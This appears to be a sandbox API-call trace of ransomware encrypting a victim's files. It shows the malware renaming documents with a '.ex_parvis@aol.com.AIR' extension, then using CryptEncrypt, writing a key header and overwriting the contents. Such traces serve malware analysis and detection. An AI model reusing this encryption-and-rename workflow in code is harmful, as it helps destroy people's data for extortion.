	[0106.125] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.125] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\ql4nmetup.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\ql4nmetup.odp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.127] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\ql4nmetup.odp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.127] GetProcessHeap () returned 0x540000
	[0106.127] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.127] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=15983) returned 1
	[0106.127] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3e6f
	[0106.128] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.128] GetProcessHeap () returned 0x540000
	[0106.128] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.128] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.128] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.129] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.129] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.129] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x3e6f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x3e6f, lpOverlapped=0x0) returned 1
	[0106.129] SetFilePointer (in: hFile=0x51c, lDistanceToMove=-15983, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.129] WriteFile (in: hFile=0x51c, lpBuffer=0x60da30*, nNumberOfBytesToWrite=0x3e6f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60da30*, lpNumberOfBytesWritten=0x3a1f778*=0x3e6f, lpOverlapped=0x0) returned 1
	[0106.129] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.129] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.129] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx", dwFileAttributes=0x80) returned 1
	[0106.130] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx") returned 71
	[0106.130] GetProcessHeap () returned 0x540000
	[0106.130] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x598b60
	[0106.130] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx"
	[0106.130] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.130] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\dc86brtfr2ogt.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\dc86brtfr2ogt.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.133] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\dC86BRtfR2oGt.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\dc86brtfr2ogt.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.133] GetProcessHeap () returned 0x540000
	[0106.133] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.133] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=95092) returned 1
	[0106.133] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17374
	[0106.133] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.133] GetProcessHeap () returned 0x540000
	[0106.133] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.133] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.133] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.134] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.134] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.135] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x17374, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x17374, lpOverlapped=0x0) returned 1
	[0106.137] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.137] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.137] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp", dwFileAttributes=0x80) returned 1
	[0106.137] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp") returned 73
	[0106.137] GetProcessHeap () returned 0x540000
	[0106.137] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x598b60
	[0106.137] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp"
	[0106.137] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.137] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\bwdvodrvlvi6vbsr.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\bwdvodrvlvi6vbsr.odp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.139] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\bwdvOdRVLvi6vbsR.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\bwdvodrvlvi6vbsr.odp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.139] GetProcessHeap () returned 0x540000
	[0106.139] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.139] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=47494) returned 1
	[0106.139] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb986
	[0106.139] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.139] GetProcessHeap () returned 0x540000
	[0106.139] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.139] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.141] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.142] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.142] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.142] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xb986, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xb986, lpOverlapped=0x0) returned 1
	[0106.144] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.144] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.144] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls", dwFileAttributes=0x80) returned 1
	[0106.144] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls") returned 69
	[0106.144] GetProcessHeap () returned 0x540000
	[0106.144] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x598b60
	[0106.144] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls"
	[0106.144] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.144] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\8p-zfnq31syn.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\8p-zfnq31syn.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.148] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\8P-zfnq31Syn.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\8p-zfnq31syn.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.148] GetProcessHeap () returned 0x540000
	[0106.148] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.148] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=65181) returned 1
	[0106.148] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xfe9d
	[0106.148] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.148] GetProcessHeap () returned 0x540000
	[0106.148] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.148] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.148] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.149] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.149] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.150] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xfe9d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xfe9d, lpOverlapped=0x0) returned 1
	[0106.151] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.151] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.151] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx", dwFileAttributes=0x80) returned 1
	[0106.151] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx") returned 76
	[0106.151] GetProcessHeap () returned 0x540000
	[0106.151] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8670
	[0106.151] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx"
	[0106.151] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.151] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\7tyopugszme_2o fhw.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\7tyopugszme_2o fhw.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.153] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\7tYopUgsZme_2o FHW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\7tyopugszme_2o fhw.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.154] GetProcessHeap () returned 0x540000
	[0106.154] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.154] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=88779) returned 1
	[0106.154] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15acb
	[0106.154] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.154] GetProcessHeap () returned 0x540000
	[0106.154] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.154] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.156] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.156] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.156] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.157] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x15acb, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x15acb, lpOverlapped=0x0) returned 1
	[0106.160] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.160] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.160] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv", dwFileAttributes=0x80) returned 1
	[0106.160] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv") returned 74
	[0106.160] GetProcessHeap () returned 0x540000
	[0106.160] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8670
	[0106.160] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv"
	[0106.160] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv.12781717671972518758.ex_parvis@aol.com.AIR"
